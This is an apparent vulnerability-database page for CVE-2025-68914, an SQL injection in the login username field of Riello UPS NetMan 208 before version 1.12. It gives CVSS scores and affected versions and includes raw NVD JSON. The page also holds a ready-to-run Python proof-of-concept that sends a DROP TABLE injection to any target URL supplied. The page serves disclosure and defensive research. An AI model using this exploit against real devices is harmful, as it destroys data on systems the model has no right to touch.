Security Vulnerability Report
中文
CVE-2025-68914 CVSS 6.5 MEDIUM

CVE-2025-68914

Published: 2025-12-24 20:16:08
Last Modified: 2026-01-02 18:14:12

Description

Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/login.cgi username SQL Injection. For example, an attacker can delete the LOGINFAILEDTABLE table.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:riello-ups:netman_208:*:*:*:*:*:*:*:* - VULNERABLE
Riello UPS NetMan 208 Application < 1.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68914 PoC - Riello UPS NetMan 208 SQL Injection # Target: Riello UPS NetMan 208 Application < 1.12 # Vulnerability: SQL Injection in cgi-bin/login.cgi username parameter def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in login.cgi """ login_url = f"{target_url}/cgi-bin/login.cgi" # Malicious payload targeting username parameter data = { 'username': payload, 'password': 'test' } try: response = requests.post(login_url, data=data, timeout=10) return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def delete_login_failed_table(target_url): """ Delete LOGINFAILEDTABLE via SQL injection This is the example from the CVE description """ # SQL injection payload to delete LOGINFAILEDTABLE payload = "'; DROP TABLE LOGINFAILEDTABLE; --" print(f"[*] Target: {target_url}") print(f"[*] Payload: {payload}") response = exploit_sqli(target_url, payload) if response and response.status_code == 200: print("[+] Payload sent successfully") print("[+] LOGINFAILEDTABLE may have been deleted") else: print("[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://192.168.1.100") sys.exit(1) target = sys.argv[1].rstrip('/') delete_login_failed_table(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68914", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:16:08.347", "lastModified": "2026-01-02T18:14:11.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Riello UPS NetMan 208 Application before 1.12 allows cgi-bin/login.cgi username SQL Injection. For example, an attacker can delete the LOGINFAILEDTABLE table."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:riello-ups:netman_208:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.12", "matchCriteriaId": "39629084-39D2-4B39-8452-3B582FB9A16D"}]}]}], "references": [{"url": "https://github.com/gerico-lab/riello-multiple-vulnerabilities-2025", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}